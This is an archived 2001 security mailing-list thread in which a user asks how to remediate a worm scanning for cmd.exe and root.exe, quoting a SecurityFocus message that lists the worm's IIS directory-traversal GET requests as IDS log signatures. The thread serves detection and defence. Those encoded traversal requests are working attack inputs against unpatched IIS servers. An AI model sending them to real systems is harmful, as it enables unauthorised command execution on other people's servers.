Re: New Worm: Massive Scans for cmd.exe/root.exe (fwd)

From: BJ Bellamy (bellamybj@lycos.com)
Date: 09/18/01 

To: "Focus-MS" <focus-ms@securityfocus.com>, "Marc Fossi" <mfossi@securityfocus.com>
Date: Tue, 18 Sep 2001 12:52:23 -0400
From: "BJ Bellamy" <bellamybj@lycos.com>
Message-ID: <CKJLMFAFCFMEPAAA@mailcity.com>
Subject: Re: New Worm:  Massive Scans for cmd.exe/root.exe (fwd)

Has anyone gotten an idea about how to deal with this worm?

According to CERT, (http://www.cert.org/current/current_activity.html#port80)
it appears to exploit MS00-078

http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS00-078.asp
Microsoft Security Bulletin (MS00-078)
Patch Available for Web Server Folder Traversal Vulnerability

But how do you remediate it?

Del readme.exe, root.exe, cmd.exe not in system32 and reboot?
Not to mention applying the patch!

Thanks to all,
BJ 

---
-------------------------------------
Do not attribute to malace what can 
be better attributed to incompetance.
-------------------------------------

On Tue, 18 Sep 2001 09:30:29  
 Marc Fossi wrote:
>Here are the entries you should see in your IDS logs.
>
>Marc Fossi, MCSE
>SecurityFocus
>www.securityfocus.com
>
>
>GET /scripts/root.exe?/c+dir
>GET /MSADC/root.exe?/c+dir
>GET /c/winnt/system32/cmd.exe?/c+dir
>GET /d/winnt/system32/cmd.exe?/c+dir
>GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
>GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
>GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
>GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
>GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
>GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
>GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
>GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
>GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
>GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
>
>
>

Make a difference, help support the relief efforts in the U.S.
http://clubs.lycos.com/live/events/september11.asp

Relevant Pages

  • RE: Microsoft Security Bulletin MS01-022
    ... Windows 2000 and Windows NT 4.0 Computers ... This patch updates the Msdaipp.dll file to version ... that you are not vulnerable to this issue, you should verify that you ... Subject: Microsoft Security Bulletin MS01-022 ...
    (Focus-Microsoft)
  • Re: W32 Blaster.Worm
    ... Having a FireWall and installing the patch for the RPC/RPCSS Buffer Overflow Vulnerability ... that is addressed by Microsoft Security Bulletin MS03-39 ... http://support.microsoft.com/?kbid=824146 will prevent reoccurrence. ...
    (microsoft.public.security.virus)
  • Re: unable to remove W32.Baster
    ... Do what taff has indicated and when you do that also install following patch for the ... RPC/RPCSS Buffer Overflow Vulnerability that is addressed by Microsoft Security Bulletin ... I got blaster virus in my system today. ...
    (microsoft.public.security.virus)
  • Microsoft Security Bulletin MS02-065
    ... Microsoft Security Bulletin MS02-065 ... Clents are browsing the NET and servers host the website ... but all are behind the Firewall. ... So Do I still need to patch them?? ...
    (microsoft.public.win2000.security)
  • Microsoft Security Bulletin MS02-065
    ... Microsoft Security Bulletin MS02-065 ... Clents are browsing the NET and servers host the website ... but all are behind the Firewall. ... So Do I still need to patch them?? ...
    (microsoft.public.win2000.security)
Loading